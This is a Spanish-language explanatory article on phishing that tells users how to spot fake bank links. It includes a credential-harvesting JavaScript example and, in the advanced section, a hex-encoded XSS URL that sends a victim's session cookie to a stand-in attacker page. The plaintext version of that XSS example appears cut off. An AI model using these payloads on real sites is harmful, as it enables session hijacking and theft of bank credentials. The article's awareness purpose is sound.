¿Que es el Pishing?
Según la wikipedia, el Pishing es lo siguiente:
“Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.”
Básicamente, el Pishing consiste en substraer datos confidenciales (contraseñas, datos bancarios…) mediante la imitación de una pagina de seguridad (la del mismo banco).

¿Como evitar el Pishing?
Es fundamental fijarse en los links de las paginas del banco, ya que muchas veces pueden no ser exactamente como tienen que ser, por ejemplo, supongamos que tenemos lo siguiente:

<script language="JavaScript">
function Redireccion() {
var pass = prompt(" Introduce la password:", "")
if(pass == null)
{
alert("Debes especificar tu password para poder entrar.")
if (confirm("¿Quieres intentarlo de nuevo?"))
{
Redireccion()
}
}
window.open("http://www.tubanco.com/usuarios.php?pass=" +
pass)
}
</script>
Este seria el supuesto javascript correcto, pues, para hacer un pishing a este código, sencillamente tendríamos que cambiar esta linea:

window.open(”http://www.tubanco.com/usuarios.php?pass=” +
pass)

por una pagina nuestra que recopilará las passwords introducidas. Muchos Pishers intentan aprovecharse de esto creando subdominios muy parecidos al que intentan Pishear, en este caso, serian del orden de:

– http://www.tubanco.hostinggratuito.com
– http: //www.tubanco@hostinggratuito.com

Si el usuario se fija en que las url’s de los links son correctas no hay posibilidad de Pishing de este tipo.

Phishing Avanzado
Las técnicas Phising mas avanzadas utilizan mezclas de html + javascript para confundir al usuario, ya que con javascript pueden pegar una foto sobre la dirección real y simular se una dirección tipo www.tubanco.com.
Otras opciones es buscar vulnerabilidades tipo Xss en la web del banco, que conlleva la ejecución de código javascript dentro de la web del banco. Un ejemplo seria el siguiente:

http://www.tubanco.com/accesosvulnerable.php?pass=”>

Una vez con la cookie, si la victima ya estaba logueada, el atacante se puede entrar en la cuenta de la victima sin necesitad de introducir ninguna contraseña. Cabe decir, que el link del robo de cookies se podría detectar muy fácilmente por el
usuario, para esconder esa información, el atacante puede codificar esa cadena del javascript en hexadecimal, quedando así:

http://www.tubanco.com/accesosvulnerable.php?pass=%22%3e%3
c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74
%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3
a%2f%2f%77%77%77%2e%70%61%67%69%6e%61%64%65%6c%
61%74%61%63%61%6e%74%65%2e%63%6f%6d%2f%72%65%67
%69%73%74%72%6f%64%65%63%6f%6f%6b%69%65%73%2e%7
0%68%70%3f%63%6f%6f%6b%69%65%3d%27%20%20%20%64%
6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%
73%63%72%69%70%74%3e

Una vez asi es imposible advertir que detrás de esos caracteres en hexadecimal se encuentra una instrucción para robarnos la cookie. Es conveniente, que si se encuentran una url de estas características, lo descodifiquen, para ver si en realidad debemos o no entrar en ese link.
Actualmente, muchos bancos han implementado la seguridad https en sus pagina, lo que garantiza que la información, antes de ser transferida, será codificada, asegurándonos así que si un atacante lograra interceptar nuestros datos, los tendría que descodificar.